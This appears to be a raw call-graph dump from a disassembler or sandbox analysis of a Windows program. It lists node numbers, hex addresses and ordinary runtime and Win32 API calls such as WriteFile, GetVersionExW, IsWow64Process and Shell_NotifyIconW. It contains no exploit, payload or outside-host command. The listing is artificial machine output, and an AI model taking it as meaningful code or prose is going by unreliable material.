780a6a 102835->102836 102837 780a60 102835->102837 102841 77d206 ___lock_fhandle 59 API calls 102836->102841 102982 778af4 58 API calls __getptd_noexit 102837->102982 102838 780a65 102986 778b28 58 API calls __getptd_noexit 102838->102986 102843 780a70 102841->102843 102845 780a8e 102843->102845 102846 780a83 102843->102846 102844 780ac9 102987 778db6 9 API calls __cftoe_l 102844->102987 102983 778b28 58 API calls __getptd_noexit 102845->102983 102965 780add 102846->102965 102849 780a27 type_info::_Type_info_dtor 102849->102812 102851 780a89 102984 780ab5 LeaveCriticalSection __unlock_fhandle 102851->102984 102853->102803 102854->102802 102856 77d892 type_info::_Type_info_dtor 102855->102856 102857 77d8b6 102856->102857 102858 77d89f 102856->102858 102860 77d955 102857->102860 102862 77d8ca 102857->102862 102956 778af4 58 API calls __getptd_noexit 102858->102956 102962 778af4 58 API calls __getptd_noexit 102860->102962 102861 77d8a4 102957 778b28 58 API calls __getptd_noexit 102861->102957 102865 77d8f2 102862->102865 102866 77d8e8 102862->102866 102883 77d206 102865->102883 102958 778af4 58 API calls __getptd_noexit 102866->102958 102869 77d8ed 102963 778b28 58 API calls __getptd_noexit 102869->102963 102870 77d8f8 102872 77d91e 102870->102872 102873 77d90b 102870->102873 102959 778b28 58 API calls __getptd_noexit 102872->102959 102892 77d975 102873->102892 102874 77d961 102964 778db6 9 API calls __cftoe_l 102874->102964 102878 77d917 102961 77d94d LeaveCriticalSection __unlock_fhandle 102878->102961 102879 77d8ab type_info::_Type_info_dtor 102879->102818 102880 77d923 102960 778af4 58 API calls __getptd_noexit 102880->102960 102884 77d212 type_info::_Type_info_dtor 102883->102884 102885 77d261 EnterCriticalSection 102884->102885 102887 779c0b __lock 58 API calls 102884->102887 102886 77d287 type_info::_Type_info_dtor 102885->102886 102886->102870 102888 77d237 102887->102888 102889 779e2b __ioinit InitializeCriticalSectionAndSpinCount 102888->102889 102891 77d24f 102888->102891 102889->102891 102890 77d28b ___lock_fhandle LeaveCriticalSection 102890->102885 102891->102890 102893 77d982 __ftell_nolock 102892->102893 102894 77d9c1 102893->102894 102895 77d9e0 102893->102895 102926 77d9b6 102893->102926 102897 778af4 __chsize_nolock 58 API calls 102894->102897 102900 77da38 102895->102900 102901 77da1c 102895->102901 102896 77c5f6 __crtLCMapStringA_stat 6 API calls 102898 77e1d6 102896->102898 102899 77d9c6 102897->102899 102898->102878 102902 778b28 __cftoe_l 58 API calls 102899->102902 102903 77da51 102900->102903 102906 7818c1 __lseeki64_nolock 60 API calls 102900->102906 102904 778af4 __chsize_nolock 58 API calls 102901->102904 102905 77d9cd 102902->102905 102907 785c6b __flswbuf 58 API calls 102903->102907 102908 77da21 102904->102908 102910 778db6 __cftoe_l 9 API calls 102905->102910 102906->102903 102911 77da5f 102907->102911 102909 778b28 __cftoe_l 58 API calls 102908->102909 102912 77da28 102909->102912 102910->102926 102913 77ddb8 102911->102913 102919 7799ac _wcstok 58 API calls 102911->102919 102914 778db6 __cftoe_l 9 API calls 102912->102914 102915 77ddd6 102913->102915 102916 77e14b WriteFile 102913->102916 102914->102926 102917 77defa 102915->102917 102924 77ddec 102915->102924 102918 77ddab GetLastError 102916->102918 102928 77dd78 102916->102928 102929 77dfef 102917->102929 102931 77df05 102917->102931 102918->102928 102921 77da8b GetConsoleMode 102919->102921 102920 77e184 102920->102926 102927 778b28 __cftoe_l 58 API calls 102920->102927 102921->102913 102922 77daca 102921->102922 102922->102913 102923 77dada GetConsoleCP 102922->102923 102923->102920 102953 77db09 102923->102953 102924->102920 102925 77de5b WriteFile 102924->102925 102925->102918 102930 77de98 102925->102930 102926->102896 102932 77e1b2 102927->102932 102928->102920 102928->102926 102933 77ded8 102928->102933 102929->102920 102934 77e064 WideCharToMultiByte 102929->102934 102930->102924 102935 77debc 102930->102935 102931->102920 102936 77df6a WriteFile 102931->102936 102937 778af4 __chsize_nolock 58 API calls 102932->102937 102938 77dee3 102933->102938 102939 77e17b 102933->102939 102934->102918 102949 77e0ab 102934->102949 102935->102928 102936->102918 102941 77dfb9 102936->102941 102937->102926 102942 778b28 __cftoe_l 58 API calls 102938->102942 102940 778b07 __dosmaperr 58 API calls 102939->102940 102940->102926 102941->102928 102941->102931 102941->102935 102943 77dee8 102942->102943 102945 778af4 __chsize_nolock 58 API calls 102943->102945 102944 77e0b3 WriteFile 102947 77e106 GetLastError 102944->102947 102944->102949 102945->102926 102946 7735f5 __write_nolock 58 API calls 102946->102953 102947->102949 102948 7862ba 60 API calls __write_nolock 102948->102953 102949->102928 102949->102929 102949->102935 102949->102944 102950 787a5e WriteConsoleW CreateFileW __putwch_nolock 102954 77dc5f 102950->102954 102951 77dbf2 WideCharToMultiByte 102951->102928 102952 77dc2d WriteFile 102951->102952 102952->102918 102952->102954 102953->102928 102953->102946 102953->102948 102953->102951 102953->102954 102954->102918 102954->102928 102954->102950 102954->102953 102955 77dc87 WriteFile 102954->102955 102955->102918 102955->102954 102956->102861 102957->102879 102958->102869 102959->102880 102960->102878 102961->102879 102962->102869 102963->102874 102964->102879 102988 77d4c3 102965->102988 102967 780b41 103001 77d43d 59 API calls 2 library calls 102967->103001 102969 780aeb 102969->102967 102970 77d4c3 __chsize_nolock 58 API calls 102969->102970 102979 780b1f 102969->102979 102974 780b16 102970->102974 102971 77d4c3 __chsize_nolock 58 API calls 102975 780b2b CloseHandle 102971->102975 102972 780b6b 102972->102851 102973 780b49 102973->102972 103002 778b07 58 API calls 3 library calls 102973->103002 102977 77d4c3 __chsize_nolock 58 API calls 102974->102977 102975->102967 102978 780b37 GetLastError 102975->102978 102977->102979 102978->102967 102979->102967 102979->102971 102980->102834 102981->102849 102982->102838 102983->102851 102984->102849 102985->102838 102986->102844 102987->102849 102989 77d4e3 102988->102989 102990 77d4ce 102988->102990 102993 778af4 __chsize_nolock 58 API calls 102989->102993 102995 77d508 102989->102995 102991 778af4 __chsize_nolock 58 API calls 102990->102991 102992 77d4d3 102991->102992 102994 778b28 __cftoe_l 58 API calls 102992->102994 102996 77d512 102993->102996 102997 77d4db 102994->102997 102995->102969 102998 778b28 __cftoe_l 58 API calls 102996->102998 102997->102969 102999 77d51a 102998->102999 103000 778db6 __cftoe_l 9 API calls 102999->103000 103000->102997 103001->102973 103002->102972 103065 781940 103003->103065 103006 75477c 103008 757bcc 59 API calls 103006->103008 103007 754799 103071 757d8c 103007->103071 103010 754788 103008->103010 103067 757726 103010->103067 103013 770791 103014 77079e __ftell_nolock 103013->103014 103015 77079f GetLongPathNameW 103014->103015 103016 757bcc 59 API calls 103015->103016 103017 7572bd 103016->103017 103018 75700b 103017->103018 103019 757667 59 API calls 103018->103019 103020 75701d 103019->103020 103021 754750 60 API calls 103020->103021 103022 757028 103021->103022 103023 757033 103022->103023 103027 78e885 103022->103027 103024 753f74 59 API calls 103023->103024 103026 75703f 103024->103026 103079 7534c2 103026->103079 103029 78e89f 103027->103029 103085 757908 61 API calls 103027->103085 103030 757052 Mailbox 103030->101891 103032 754ddd 136 API calls 103031->103032 103033 75688f 103032->103033 103034 78e031 103033->103034 103036 754ddd 136 API calls 103033->103036 103035 7b955b 122 API calls 103034->103035 103038 78e046 103035->103038 103037 7568a3 103036->103037 103037->103034 103039 7568ab 103037->103039 103040 78e04a 103038->103040 103041 78e067 103038->103041 103042 7568b7 103039->103042 103043 78e052 103039->103043 103044 754e4a 84 API calls 103040->103044 103045 770db6 Mailbox 59 API calls 103041->103045 103086 756a8c 103042->103086 103193 7b42f8 90 API calls _wprintf 103043->103193 103044->103043 103056 78e0ac Mailbox 103045->103056 103049 78e060 103049->103041 103050 78e260 103051 772d55 _free 58 API calls 103050->103051 103052 78e268 103051->103052 103053 754e4a 84 API calls 103052->103053 103055 78e271 103053->103055 103059 772d55 _free 58 API calls 103055->103059 103060 754e4a 84 API calls 103055->103060 103197 7af7a1 89 API calls 4 library calls 103055->103197 103056->103050 103056->103055 103062 757de1 59 API calls 103056->103062 103179 75750f 103056->103179 103187 75735d 103056->103187 103194 7af73d 59 API calls 2 library calls 103056->103194 103195 7af65e 61 API calls 2 library calls 103056->103195 103196 7b737f 59 API calls Mailbox 103056->103196 103059->103055 103060->103055 103062->103056 103066 75475d GetFullPathNameW 103065->103066 103066->103006 103066->103007 103068 757734 103067->103068 103075 757d2c 103068->103075 103070 754794 103070->103013 103072 757da6 103071->103072 103073 757d99 103071->103073 103074 770db6 Mailbox 59 API calls 103072->103074 103073->103010 103074->103073 103076 757d3a 103075->103076 103078 757d43 _memmove 103075->103078 103077 757e4f 59 API calls 103076->103077 103076->103078 103077->103078 103078->103070 103080 7534d4 103079->103080 103084 7534f3 _memmove 103079->103084 103082 770db6 Mailbox 59 API calls 103080->103082 103081 770db6 Mailbox 59 API calls 103083 75350a 103081->103083 103082->103084 103083->103030 103084->103081 103085->103027 103087 756ab5 103086->103087 103088 78e41e 103086->103088 103203 7557a6 60 API calls Mailbox 103087->103203 103270 7af7a1 89 API calls 4 library calls 103088->103270 103091 756ad7 103204 7557f6 67 API calls 103091->103204 103092 78e431 103271 7af7a1 89 API calls 4 library calls 103092->103271 103094 756aec 103094->103092 103095 756af4 103094->103095 103097 757667 59 API calls 103095->103097 103099 756b00 103097->103099 103098 78e44d 103127 756b61 103098->103127 103205 770957 60 API calls __ftell_nolock 103099->103205 103101 78e460 103104 755c6f CloseHandle 103101->103104 103102 756b6f 103105 757667 59 API calls 103102->103105 103103 756b0c 103106 757667 59 API calls 103103->103106 103107 78e46c 103104->103107 103108 756b78 103105->103108 103109 756b18 103106->103109 103110 754ddd 136 API calls 103107->103110 103111 757667 59 API calls 103108->103111 103112 754750 60 API calls 103109->103112 103114 78e488 103110->103114 103115 756b81 103111->103115 103113 756b26 103112->103113 103206 755850 ReadFile SetFilePointerEx 103113->103206 103117 78e4b1 103114->103117 103120 7b955b 122 API calls 103114->103120 103208 75459b 103115->103208 103272 7af7a1 89 API calls 4 library calls 103117->103272 103119 756b52 103207 755aee SetFilePointerEx SetFilePointerEx 103119->103207 103124 78e4a4 103120->103124 103121 756b98 103125 757b2e 59 API calls 103121->103125 103128 78e4ac 103124->103128 103129 78e4cd 103124->103129 103130 756ba9 SetCurrentDirectoryW 103125->103130 103126 78e4c8 103157 756d0c Mailbox 103126->103157 103127->103101 103127->103102 103132 754e4a 84 API calls 103128->103132 103131 754e4a 84 API calls 103129->103131 103135 756bbc Mailbox 103130->103135 103133 78e4d2 103131->103133 103132->103117 103134 770db6 Mailbox 59 API calls 103133->103134 103141 78e506 103134->103141 103137 770db6 Mailbox 59 API calls 103135->103137 103139 756bcf 103137->103139 103138 753bbb 103138->101756 103138->101780 103140 75522e 59 API calls 103139->103140 103168 756bda Mailbox __wsetenvp 103140->103168 103142 75750f 59 API calls 103141->103142 103174 78e54f Mailbox 103142->103174 103143 756ce7 103266 755c6f 103143->103266 103146 78e740 103277 7b72df 59 API calls Mailbox 103146->103277 103147 756cf3 SetCurrentDirectoryW 103147->103157 103150 78e762 103278 7cfbce 59 API calls 2 library calls 103150->103278 103153 78e76f 103154 772d55 _free 58 API calls 103153->103154 103154->103157 103155 78e7d9 103281 7af7a1 89 API calls 4 library calls 103155->103281 103198 7557d4 103157->103198 103159 75750f 59 API calls 103159->103174 103160 78e7f2 103160->103143 103162 78e7d1 103280 7af5f7 59 API calls 4 library calls 103162->103280 103165 757de1 59 API calls 103165->103168 103168->103143 103168->103155 103168->103162 103168->103165 103259 75586d 67 API calls _wcscpy 103168->103259 103260 756f5d GetStringTypeW 103168->103260 103261 756ecc 60 API calls __wcsnicmp 103168->103261 103262 756faa GetStringTypeW __wsetenvp 103168->103262 103263 77363d GetStringTypeW _iswctype 103168->103263 103264 7568dc 165 API calls 3 library calls 103168->103264 103265 757213 59 API calls Mailbox 103168->103265 103169 757de1 59 API calls 103169->103174 103173 78e792 103279 7af7a1 89 API calls 4 library calls 103173->103279 103174->103146 103174->103159 103174->103169 103174->103173 103273 7af73d 59 API calls 2 library calls 103174->103273 103274 7af65e 61 API calls 2 library calls 103174->103274 103275 7b737f 59 API calls Mailbox 103174->103275 103276 757213 59 API calls Mailbox 103174->103276 103176 78e7ab 103177 772d55 _free 58 API calls 103176->103177 103178 78e7be 103177->103178 103178->103157 103180 7575af 103179->103180 103186 757522 _memmove 103179->103186 103182 770db6 Mailbox 59 API calls 103180->103182 103181 770db6 Mailbox 59 API calls 103183 757529 103181->103183 103182->103186 103184 757552 103183->103184 103185 770db6 Mailbox 59 API calls 103183->103185 103184->103056 103185->103184 103186->103181 103188 757370 103187->103188 103190 75741e 103187->103190 103189 770db6 Mailbox 59 API calls 103188->103189 103192 7573a2 103188->103192 103189->103192 103190->103056 103191 770db6 59 API calls Mailbox 103191->103192 103192->103190 103192->103191 103193->103049 103194->103056 103195->103056 103196->103056 103197->103055 103199 755c6f CloseHandle 103198->103199 103200 7557dc Mailbox 103199->103200 103201 755c6f CloseHandle 103200->103201 103202 7557eb 103201->103202 103202->103138 103203->103091 103204->103094 103205->103103 103206->103119 103207->103127 103209 757667 59 API calls 103208->103209 103210 7545b1 103209->103210 103211 757667 59 API calls 103210->103211 103212 7545b9 103211->103212 103213 757667 59 API calls 103212->103213 103214 7545c1 103213->103214 103215 757667 59 API calls 103214->103215 103216 7545c9 103215->103216 103217 7545fd 103216->103217 103218 78d4d2 103216->103218 103219 75784b 59 API calls 103217->103219 103220 758047 59 API calls 103218->103220 103221 75460b 103219->103221 103222 78d4db 103220->103222 103223 757d2c 59 API calls 103221->103223 103224 757d8c 59 API calls 103222->103224 103225 754615 103223->103225 103227 754640 103224->103227 103226 75784b 59 API calls 103225->103226 103225->103227 103230 754636 103226->103230 103228 754680 103227->103228 103231 75465f 103227->103231 103241 78d4fb 103227->103241 103282 75784b 103228->103282 103234 757d2c 59 API calls 103230->103234 103232 7579f2 59 API calls 103231->103232 103236 754669 103232->103236 103233 754691 103237 7546a3 103233->103237 103239 758047 59 API calls 103233->103239 103234->103227 103235 78d5cb 103238 757bcc 59 API calls 103235->103238 103236->103228 103242 75784b 59 API calls 103236->103242 103240 7546b3 103237->103240 103243 758047 59 API calls 103237->103243 103254 78d588 103238->103254 103239->103237 103245 7546ba 103240->103245 103246 758047 59 API calls 103240->103246 103241->103235 103244 78d5b4 103241->103244 103253 78d532 103241->103253 103242->103228 103243->103240 103244->103235 103250 78d59f 103244->103250 103247 758047 59 API calls 103245->103247 103256 7546c1 Mailbox 103245->103256 103246->103245 103247->103256 103248 7579f2 59 API calls 103248->103254 103249 78d590 103251 757bcc 59 API calls 103249->103251 103252 757bcc 59 API calls 103250->103252 103251->103254 103252->103254 103253->103249 103257 78d57b 103253->103257 103254->103228 103254->103248 103295 757924 59 API calls 2 library calls 103254->103295 103256->103121 103258 757bcc 59 API calls 103257->103258 103258->103254 103259->103168 103260->103168 103261->103168 103262->103168 103263->103168 103264->103168 103265->103168 103267 755c79 103266->103267 103268 755c88 103266->103268 103267->103147 103268->103267 103269 755c8d CloseHandle 103268->103269 103269->103267 103270->103092 103271->103098 103272->103126 103273->103174 103274->103174 103275->103174 103276->103174 103277->103150 103278->103153 103279->103176 103280->103155 103281->103160 103283 7578b7 103282->103283 103284 75785a 103282->103284 103285 757d2c 59 API calls 103283->103285 103284->103283 103286 757865 103284->103286 103292 757888 _memmove 103285->103292 103287 78eb09 103286->103287 103288 757880 103286->103288 103297 758029 103287->103297 103296 757f27 59 API calls Mailbox 103288->103296 103291 78eb13 103293 770db6 Mailbox 59 API calls 103291->103293 103292->103233 103294 78eb33 103293->103294 103295->103254 103296->103292 103298 770db6 Mailbox 59 API calls 103297->103298 103299 758033 103298->103299 103299->103291 103300->101902 103302 756d95 103301->103302 103303 756ea9 103301->103303 103302->103303 103304 770db6 Mailbox 59 API calls 103302->103304 103303->101906 103306 756dbc 103304->103306 103305 770db6 Mailbox 59 API calls 103311 756e31 103305->103311 103306->103305 103309 75735d 59 API calls 103309->103311 103310 75750f 59 API calls 103310->103311 103311->103303 103311->103309 103311->103310 103314 756240 103311->103314 103339 7a6553 59 API calls Mailbox 103311->103339 103312->101908 103313->101910 103340 757a16 103314->103340 103316 75646a 103317 75750f 59 API calls 103316->103317 103318 756484 Mailbox 103317->103318 103318->103311 103321 78dff6 103349 7af8aa 91 API calls 4 library calls 103321->103349 103322 757d8c 59 API calls 103333 756265 103322->103333 103323 75750f 59 API calls 103323->103333 103327 78e004 103328 75750f 59 API calls 103327->103328 103329 78e01a 103328->103329 103329->103318 103330 756799 _memmove 103350 7af8aa 91 API calls 4 library calls 103330->103350 103331 78df92 103332 758029 59 API calls 103331->103332 103334 78df9d 103332->103334 103333->103316 103333->103321 103333->103322 103333->103323 103333->103330 103333->103331 103336 757e4f 59 API calls 103333->103336 103345 755f6c 60 API calls 103333->103345 103346 755d41 59 API calls Mailbox 103333->103346 103347 755e72 60 API calls 103333->103347 103348 757924 59 API calls 2 library calls 103333->103348 103338 770db6 Mailbox 59 API calls 103334->103338 103337 75643b CharUpperBuffW 103336->103337 103337->103333 103338->103330 103339->103311 103341 770db6 Mailbox 59 API calls 103340->103341 103342 757a3b 103341->103342 103343 758029 59 API calls 103342->103343 103344 757a4a 103343->103344 103344->103333 103345->103333 103346->103333 103347->103333 103348->103333 103349->103327 103350->103318 103351->101924 103352->101925 103354 754196 103353->103354 103355 78d423 103353->103355 103354->101931 103379 7b2f94 62 API calls _W_store_winword 103354->103379 103355->103354 103356 78d42c DestroyIcon 103355->103356 103356->103354 103379->101931 103381 75e451 103380->103381 103382 75e43d 103380->103382 103557 7b9e4a 89 API calls 4 library calls 103381->103557 103556 75df00 341 API calls 2 library calls 103382->103556 103384 75e448 103384->102009 103386 793aa4 103386->103386 103388 75e6d5 103387->103388 103389 793aa9 103388->103389 103391 75e73f 103388->103391 103401 75e799 103388->103401 103558 759ea0 103389->103558 103395 757667 59 API calls 103391->103395 103391->103401 103393 757667 59 API calls 103393->103401 103397 793b04 103395->103397 103396 772d40 __cinit 67 API calls 103396->103401 103398 793b26 103398->102009 103400 7584c0 69 API calls 103405 75e970 Mailbox 103400->103405 103401->103393 103401->103396 103401->103398 103402 75e95a 103401->103402 103401->103405 103402->103405 103583 7b9e4a 89 API calls 4 library calls 103402->103583 103404 758d40 59 API calls 103404->103405 103405->103400 103405->103404 103406 759ea0 341 API calls 103405->103406 103408 7b9e4a 89 API calls 103405->103408 103411 757f77 59 API calls 103405->103411 103413 75f195 103405->103413 103417 75ea78 103405->103417 103584 7a6e8f 59 API calls 103405->103584 103585 7cc5c3 341 API calls 103405->103585 103586 7cb53c 341 API calls Mailbox 103405->103586 103588 759c90 59 API calls Mailbox 103405->103588 103589 7c93c6 341 API calls Mailbox 103405->103589 103406->103405 103408->103405 103411->103405 103417->102009 103419 75f650 103418->103419 103420 75f4ba 103418->103420 103421 757de1 59 API calls 103419->103421 103422 75f4c6 103420->103422 103423 79441e 103420->103423 103429 75f58c Mailbox 103421->103429 103596 75f290 103422->103596 103707 7cbc6b 341 API calls Mailbox 103423->103707 103437 754e4a 84 API calls 103429->103437 103611 7bcb7a 103429->103611 103691 7b3c37 103429->103691 103694 7c445a 103429->103694 103703 7cdf37 103429->103703 103928 758180 103438->103928 103440 75fd3d 103441 79472d 103440->103441 103518->102009 103519->101943 103521->102009 103522->101953 103523->101953 103524->101953 103525->102009 103526->102009 103527->102009 103529 759851 103528->103529 103538 75984b 103528->103538 103530 759857 __itow 103529->103530 103531 759899 103529->103531 103536 78f5d3 __i64tow 103529->103536 103537 78f4da 103529->103537 103533 770db6 Mailbox 59 API calls 103530->103533 103970 773698 83 API calls 3 library calls 103531->103970 103535 759871 103533->103535 103535->103538 103539 770db6 Mailbox 59 API calls 103537->103539 103544 78f552 Mailbox _wcscpy 103537->103544 103538->102009 103546->102009 103547->102009 103548->102009 103549->101999 103550->101999 103551->101999 103552->101999 103553->101999 103554->101999 103555->101999 103556->103384 103557->103386 103559 759ebf 103558->103559 103576 759eed Mailbox 103558->103576 103583->103405 103584->103405 103585->103405 103586->103405 103588->103405 103589->103405 103597 75f43a 103596->103597 103599 75f2bc 103596->103599 103599->103597 103929 75818f 103928->103929 103932 7581aa 103928->103932 103930 757e4f 59 API calls 103929->103930 103932->103440 103970->103530 103984 751066 103989 75f76f 103984->103989 103986 75106c 103987 772d40 __cinit 67 API calls 103986->103987 103988 751076 103987->103988 103990 75f790 103989->103990 104022 76ff03 103990->104022 103994 75f7d7 103995 757667 59 API calls 103994->103995 103996 75f7e1 103995->103996 103997 757667 59 API calls 103996->103997 103998 75f7eb 103997->103998 103999 757667 59 API calls 103998->103999 104000 75f7f5 103999->104000 104001 757667 59 API calls 104000->104001 104002 75f833 104001->104002 104003 757667 59 API calls 104002->104003 104004 75f8fe 104003->104004 104032 765f87 104004->104032 104008 75f930 104009 757667 59 API calls 104008->104009 104010 75f93a 104009->104010 104060 76fd9e 104010->104060 104012 75f981 104013 75f991 GetStdHandle 104012->104013 104014 7945ab 104013->104014 104015 75f9dd 104013->104015 104014->104015 104017 7945b4 104014->104017 104016 75f9e5 OleInitialize 104015->104016 104016->103986 104067 7b6b38 64 API calls Mailbox 104017->104067 104019 7945bb 104068 7b7207 CreateThread 104019->104068 104021 7945c7 CloseHandle 104021->104016 104069 76ffdc 104022->104069 104025 76ffdc 59 API calls 104026 76ff45 104025->104026 104027 757667 59 API calls 104026->104027 104028 76ff51 104027->104028 104029 757bcc 59 API calls 104028->104029 104030 75f796 104029->104030 104031 770162 6 API calls 104030->104031 104031->103994 104033 757667 59 API calls 104032->104033 104034 765f97 104033->104034 104035 757667 59 API calls 104034->104035 104036 765f9f 104035->104036 104076 765a9d 104036->104076 104039 765a9d 59 API calls 104040 765faf 104039->104040 104041 757667 59 API calls 104040->104041 104042 765fba 104041->104042 104043 770db6 Mailbox 59 API calls 104042->104043 104044 75f908 104043->104044 104045 7660f9 104044->104045 104046 766107 104045->104046 104047 757667 59 API calls 104046->104047 104048 766112 104047->104048 104049 757667 59 API calls 104048->104049 104050 76611d 104049->104050 104051 757667 59 API calls 104050->104051 104052 766128 104051->104052 104053 757667 59 API calls 104052->104053 104054 766133 104053->104054 104055 765a9d 59 API calls 104054->104055 104056 76613e 104055->104056 104057 770db6 Mailbox 59 API calls 104056->104057 104058 766145 RegisterWindowMessageW 104057->104058 104058->104008 104061 7a576f 104060->104061 104062 76fdae 104060->104062 104079 7b9ae7 60 API calls 104061->104079 104064 770db6 Mailbox 59 API calls 104062->104064 104066 76fdb6 104064->104066 104065 7a577a 104066->104012 104067->104019 104068->104021 104080 7b71ed 65 API calls 104068->104080 104070 757667 59 API calls 104069->104070 104071 76ffe7 104070->104071 104072 757667 59 API calls 104071->104072 104073 76ffef 104072->104073 104074 757667 59 API calls 104073->104074 104075 76ff3b 104074->104075 104075->104025 104077 757667 59 API calls 104076->104077 104078 765aa5 104077->104078 104078->104039 104079->104065 104081 751016 104086 754974 104081->104086 104084 772d40 __cinit 67 API calls 104085 751025 104084->104085 104087 770db6 Mailbox 59 API calls 104086->104087 104088 75497c 104087->104088 104089 75101b 104088->104089 104093 754936 104088->104093 104089->104084 104094 754951 104093->104094 104095 75493f 104093->104095 104097 7549a0 104094->104097 104096 772d40 __cinit 67 API calls 104095->104096 104096->104094 104098 757667 59 API calls 104097->104098 104099 7549b8 GetVersionExW 104098->104099 104100 757bcc 59 API calls 104099->104100 104101 7549fb 104100->104101 104102 757d2c 59 API calls 104101->104102 104111 754a28 104101->104111 104103 754a1c 104102->104103 104104 757726 59 API calls 104103->104104 104104->104111 104105 754a93 GetCurrentProcess IsWow64Process 104106 754aac 104105->104106 104108 754ac2 104106->104108 104109 754b2b GetSystemInfo 104106->104109 104107 78d864 104121 754b37 104108->104121 104110 754af8 104109->104110 104110->104089 104111->104105 104111->104107 104114 754ad4 104117 754b37 2 API calls 104114->104117 104115 754b1f GetSystemInfo 104116 754ae9 104115->104116 104116->104110 104118 754aef FreeLibrary 104116->104118 104119 754adc GetNativeSystemInfo 104117->104119 104118->104110 104119->104116 104122 754ad0 104121->104122 104123 754b40 LoadLibraryA 104121->104123 104122->104114 104122->104115 104123->104122 104124 754b51 GetProcAddress 104123->104124 104124->104122 104125 78fdfc 104129 75ab30 Mailbox _memmove 104125->104129 104131 75b525 104129->104131 104149 757de1 59 API calls 104129->104149 104153 75a057 104129->104153 104154 759f37 Mailbox 104129->104154 104158 770db6 59 API calls Mailbox 104129->104158 104159 75b2b6 104129->104159 104161 759ea0 341 API calls 104129->104161 104162 79086a 104129->104162 104164 790878 104129->104164 104166 79085c 104129->104166 104167 75b21c 104129->104167 104171 7a6e8f 59 API calls 104129->104171 104172 7c445a 341 API calls 104129->104172 104175 7d2141 104129->104175 104213 7cdf23 104129->104213 104218 759c90 59 API calls Mailbox 104129->104218 104222 7cc193 85 API calls 2 library calls 104129->104222 104223 7cc2e0 96 API calls Mailbox 104129->104223 104224 7b7956 59 API calls Mailbox 104129->104224 104225 7cbc6b 341 API calls Mailbox 104129->104225 104226 7a617e 59 API calls Mailbox 104129->104226 104228 7b9e4a 89 API calls 4 library calls 104131->104228 104133 7909e5 104234 7b9e4a 89 API calls 4 library calls 104133->104234 104134 790055 104227 7b9e4a 89 API calls 4 library calls 104134->104227 104137 770db6 59 API calls Mailbox 104137->104154 104139 75b475 104145 758047 59 API calls 104139->104145 104140 758047 59 API calls 104140->104154 104141 790064 104142 75b47a 104142->104133 104142->104134 104145->104153 104147 757667 59 API calls 104147->104154 104148 772d40 67 API calls __cinit 104148->104154 104149->104129 104150 7a6e8f 59 API calls 104150->104154 104151 7909d6 104233 7b9e4a 89 API calls 4 library calls 104151->104233 104154->104134 104154->104137 104154->104139 104154->104140 104154->104142 104154->104147 104154->104148 104154->104150 104154->104151 104154->104153 104156 75a55a 104154->104156 104216 75c8c0 341 API calls 2 library calls 104154->104216 104217 75b900 60 API calls Mailbox 104154->104217 104232 7b9e4a 89 API calls 4 library calls 104156->104232 104158->104129 104221 75f6a3 341 API calls 104159->104221 104161->104129 104230 759c90 59 API calls Mailbox 104162->104230 104231 7b9e4a 89 API calls 4 library calls 104164->104231 104166->104153 104229 7a617e 59 API calls Mailbox 104166->104229 104219 759d3c 60 API calls Mailbox 104167->104219 104169 75b22d 104220 759d3c 60 API calls Mailbox 104169->104220 104171->104129 104172->104129 104176 757667 59 API calls 104175->104176 104177 7d2158 104176->104177 104178 759837 84 API calls 104177->104178 104179 7d2167 104178->104179 104180 757a16 59 API calls 104179->104180 104181 7d217a 104180->104181 104182 759837 84 API calls 104181->104182 104183 7d2187 104182->104183 104184 7d2215 104183->104184 104185 7d21a1 104183->104185 104186 759837 84 API calls 104184->104186 104254 759b3c 59 API calls 104185->104254 104188 7d221a 104186->104188 104190 7d2228 104188->104190 104191 7d2246 104188->104191 104189 7d21a6 104192 7d2204 104189->104192 104194 7d21bd 104189->104194 104256 759a98 59 API calls Mailbox 104190->104256 104195 7d225b 104191->104195 104257 759b3c 59 API calls 104191->104257 104255 759a98 59 API calls Mailbox 104192->104255 104198 75784b 59 API calls 104194->104198 104200 7d2270 104195->104200 104258 759b3c 59 API calls 104195->104258 104197 7d2211 Mailbox 104197->104129 104202 7d21ca 104198->104202 104201 757f77 59 API calls 104200->104201 104204 7d228a 104201->104204 104205 757b2e 59 API calls 104202->104205 104235 7af401 104204->104235 104207 7d21d8 104205->104207 104208 75784b 59 API calls 104207->104208 104210 7d21f1 104208->104210 104209 7d21ff 104259 759a3c 59 API calls Mailbox 104209->104259 104211 757b2e 59 API calls 104210->104211 104211->104209 104214 7ccadd 130 API calls 104213->104214 104215 7cdf33 104214->104215 104215->104129 104216->104154 104217->104154 104218->104129 104219->104169 104220->104159 104221->104131 104222->104129 104223->104129 104224->104129 104225->104129 104226->104129 104227->104141 104228->104166 104229->104153 104230->104166 104231->104166 104232->104153 104233->104133 104234->104153 104236 757667 59 API calls 104235->104236 104237 7af414 104236->104237 104238 757a16 59 API calls 104237->104238 104239 7af428 104238->104239 104240 7af167 61 API calls 104239->104240 104246 7af44a 104239->104246 104242 7af444 104240->104242 104241 7af167 61 API calls 104241->104246 104244 75784b 59 API calls 104242->104244 104242->104246 104243 7af4c4 104247 75784b 59 API calls 104243->104247 104244->104246 104245 75784b 59 API calls 104245->104246 104246->104241 104246->104243 104246->104245 104249 757b2e 59 API calls 104246->104249 104248 7af4dd 104247->104248 104250 757b2e 59 API calls 104248->104250 104249->104246 104251 7af4e9 104250->104251 104252 757f77 59 API calls 104251->104252 104253 7af4f8 Mailbox 104251->104253 104252->104253 104253->104209 104254->104189 104255->104197 104256->104197 104257->104195 104258->104200 104259->104197 104260 753633 104261 75366a 104260->104261 104262 7536e7 104261->104262 104263 753688 104261->104263 104304 7536e5 104261->104304 104265 78d0cc 104262->104265 104266 7536ed 104262->104266 104267 753695 104263->104267 104268 75374b PostQuitMessage 104263->104268 104264 7536ca DefWindowProcW 104301 7536d8 104264->104301 104309 761070 10 API calls Mailbox 104265->104309 104271 753715 SetTimer RegisterWindowMessageW 104266->104271 104272 7536f2 104266->104272 104269 7536a0 104267->104269 104270 78d154 104267->104270 104268->104301 104275 753755 104269->104275 104276 7536a8 104269->104276 104314 7b2527 71 API calls _memset 104270->104314 104277 75373e CreatePopupMenu 104271->104277 104271->104301 104279 78d06f 104272->104279 104280 7536f9 KillTimer 104272->104280 104274 78d0f3 104310 761093 341 API calls Mailbox 104274->104310 104307 7544a0 64 API calls _memset 104275->104307 104282 78d139 104276->104282 104283 7536b3 104276->104283 104277->104301 104286 78d0a8 MoveWindow 104279->104286 104287 78d074 104279->104287 104305 75443a Shell_NotifyIconW _memset 104280->104305 104282->104264 104313 7a7c36 59 API calls Mailbox 104282->104313 104289 7536be 104283->104289 104290 78d124 104283->104290 104284 78d166 104284->104264 104284->104301 